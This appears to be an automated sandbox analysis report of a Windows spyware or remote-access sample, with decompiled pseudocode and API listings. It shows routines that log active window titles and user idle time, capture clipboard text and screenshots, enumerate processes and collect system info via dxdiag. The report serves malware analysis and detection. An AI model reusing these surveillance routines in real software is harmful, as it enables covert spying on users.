                                  					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
                                  						break;
                                  					}
                                  					if(( *0x41b990 & 0x00000001) == 0) {
                                  						 *0x41b990 =  *0x41b990 | 0x00000001;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                  						E00413E72(E00405BB5);
                                  					}
                                  					Sleep(0x1f4);
                                  					_t93 = GetForegroundWindow();
                                  					_t43 = GetWindowTextLengthA(_t93);
                                  					_t95 = _t43;
                                  					_t9 = _t95 + 1; // 0x1
                                  					_t45 = _t9;
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t45, 0,  &_v6);
                                  					if(_t43 != 0) {
                                  						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  						GetWindowTextA(_t93, _t45, _t45);
                                  						_t58 =  &_v44;
                                  						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t58, 0x41b998);
                                  						if(_t58 == 0) {
                                  							_t59 =  &_v44;
                                  							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t59);
                                  							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t59 - 1);
                                  							_t112 =  *0x41b93e; // 0x0
                                  							if(_t112 == 0) {
                                  								_t103 = _t99 - 0x10;
                                  								L00414176();
                                  								L00414170();
                                  								_t99 = _t99 - 0x10 + 0x18;
                                  								E004054E9(_v12, _t103,  &_v60,  &_v60, "\r\n[ ",  &_v44);
                                  								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
                                  							} else {
                                  								_t99 = _t99 - 0x10;
                                  								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  								E00405DD3(_v12,  &_v44);
                                  							}
                                  						}
                                  					}
                                  					_t94 = _v12;
                                  					_t71 = _t94;
                                  					E00406C35(_t94);
                                  					if(E0041269B(_t94) < 0xea60) {
                                  						L16:
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						continue;
                                  					} else {
                                  						while( *((intOrPtr*)(_t94 + 0x3c)) != 0 ||  *((intOrPtr*)(_t94 + 0x3d)) != 0) {
                                  							_t48 = E0041269B(_t71);
                                  							if(_t48 < 0xea60) {
                                  								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);
                                  								_t101 = _t99 + 0xc - 0x10;
                                  								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
                                  								L00414176();
                                  								L00414170();
                                  								_t99 = _t99 + 0xc - 0x10 + 0x18;
                                  								E004054E9(_t94, _t101,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
                                  								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  								goto L16;
                                  							}
                                  							_v16 = _t48;
                                  							Sleep(0x3e8);
                                  						}
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						break;
                                  					}
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004059F6
                                  • Sleep.KERNEL32(000001F4), ref: 00405A0C
                                  • GetForegroundWindow.USER32 ref: 00405A12
                                  • GetWindowTextLengthA.USER32(00000000), ref: 00405A1B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 00405A2F
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A40
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405A4A
                                  • GetWindowTextA.USER32 ref: 00405A52
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B998), ref: 00405A61
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00405A76
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A7F
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00405A8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405AA1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ],?,?,00000000), ref: 00405AC9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ],?,?,00000000), ref: 00405AD3
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                    • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                    • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405AE6
                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?, ],?,?,00000000), ref: 00405B27
                                  • _itoa.MSVCRT ref: 00405B3D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B5C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B6C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405B76
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B88
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B91
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B9A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405BA8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@$D@1@@V01@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                  • String ID: [ ${ User has been idle for $ ]$ minutes }
                                  • API String ID: 615312007-3343415809
                                  • Opcode ID: 5f570c7ad1d30cb41594ba76545dd26972d348bd779eaad3ce5967d6990f75db
                                  • Instruction ID: 24516c956339191e20f1f3c27382aafae9a0e704c06eebb7e5bf761840e1d674
                                  • Opcode Fuzzy Hash: 5f570c7ad1d30cb41594ba76545dd26972d348bd779eaad3ce5967d6990f75db
                                  • Instruction Fuzzy Hash: CC517072900609EBCB00EBA0DC899EF7F78EF44315F04407AE502E7191EB785989CFA9
                                  Uniqueness Score: -1.00%
                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                    • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                    • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                    • Part of subcall function 0040F925: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 0040F942
                                    • Part of subcall function 0040FE07: malloc.MSVCRT ref: 0040FE2E
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                    • Part of subcall function 00410AF7: GdipSaveImageToFile.GDIPLUS(?,004109D1,?,00000000,00000000,?,004109D1,00000000), ref: 00410B09
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                  • DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410A8A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410A98
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410AA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410AB1
                                    • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                    • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                    • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AC2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410ACB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AD4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AE5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AEE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$?size@?$basic_string@CreateD@1@@File$?data@?$basic_string@G@1@@G@2@@0@GdipHstd@@ImageV01@@V10@V?$basic_string@$?length@?$basic_string@CompatibleDeleteFromLoadSaveStreammalloc
                                  • String ID: dat$image/png$png
                                  • API String ID: 1465418526-186023265
                                  • Opcode ID: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                  • Instruction ID: 6c1464b703b8d6621652859688a13e3a01469ca8af73c80fd23fe2d238e37a16
                                  • Opcode Fuzzy Hash: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                  • Instruction Fuzzy Hash: 4F41E87280050DEBCB05EBE0ED5A9EE7B78EF54345B50807AF506A70A1EF745B48CB98
                                  Uniqueness Score: -1.00%
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                    • Part of subcall function 00412AEB: GetCurrentProcess.KERNEL32(00408F3A,?,?,00408F3A,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00412AFC
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                    • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                    • Part of subcall function 00412B4A: OpenProcess.KERNEL32(00000410,00000000,00409B39,6B03CB60), ref: 00412B5E
                                    • Part of subcall function 00412B4A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00409FE3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409FF0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040A000
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A00C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A018
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A021
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A02D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A036
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A042
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A04B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A057
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A060
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A069
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A075
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A081
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A08D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A099
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0A2
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A0B0
                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 0040A0BF
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000002,00000000), ref: 0040A0CC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0D5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32$G@1@@NextOpenV01@@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                                  • String ID:
                                  • API String ID: 819894693-0
                                  • Opcode ID: 6d7e0a8e1be64d4d0e255c379d67c754dda12e9502e18d4a3b94b6445093a707
                                  • Instruction ID: 482952a8ea0ca2eb956ab1d6be5e182e2b7f1aefe0fc538246f9d1fd03369c75
                                  • Opcode Fuzzy Hash: 6d7e0a8e1be64d4d0e255c379d67c754dda12e9502e18d4a3b94b6445093a707
                                  • Instruction Fuzzy Hash: B151E07180021EABCB15EBA1ED49EDFB77CAF54345F0040A6B506E3052EB745B89CF65
                                  Uniqueness Score: -1.00%
                                  APIs
                                  • _wgetenv.MSVCRT ref: 0040E93E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,00000000), ref: 0040E949
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040E954
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E95F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,/t ,?,00000000,00000000), ref: 0040E976
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000), ref: 0040E980
                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,?,00000000), ref: 0040E992
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000,00000000), ref: 0040E99B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000), ref: 0040E9A8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000000,00000000), ref: 0040E9B7
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • Sleep.KERNEL32(00000064,00000000,00000000), ref: 0040E9C7
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9D1
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9E6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040E9F7
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040E9FE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040EA3C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040EA46
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000097,?,?,?,?,?,?), ref: 0040EA5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA77
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA80
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA89
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@std@@$G@2@@std@@$??1?$basic_string@D@2@@std@@$Hstd@@V?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@?empty@?$basic_string@D@2@@0@FileG@2@@0@V10@0@$CreateD@1@@DeleteExecuteG@1@@ShellSleepV10@V10@@_wgetenv
                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                  • API String ID: 1966616101-2001430897
                                  • Opcode ID: ff0e39e396bbf46ea60dadb1ea34f8f26dedf6304284c23b1de840788f93d481
                                  • Instruction ID: 1c5eb7ae2d6a6dc7204c520a9e58a8966c6b8e2557f2cc0bdb06ecab60d4e380
                                  • Opcode Fuzzy Hash: ff0e39e396bbf46ea60dadb1ea34f8f26dedf6304284c23b1de840788f93d481
                                  • Instruction Fuzzy Hash: 0D41657280050DEFCB04EBE0ED4ADEEB77CEE54345B10402AF912A3091EB755A49CB69
                                  Uniqueness Score: -1.00%
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A383
                                  • SetEvent.KERNEL32(?), ref: 0040A38C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A395
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040A3AD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040A3BE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A3CD
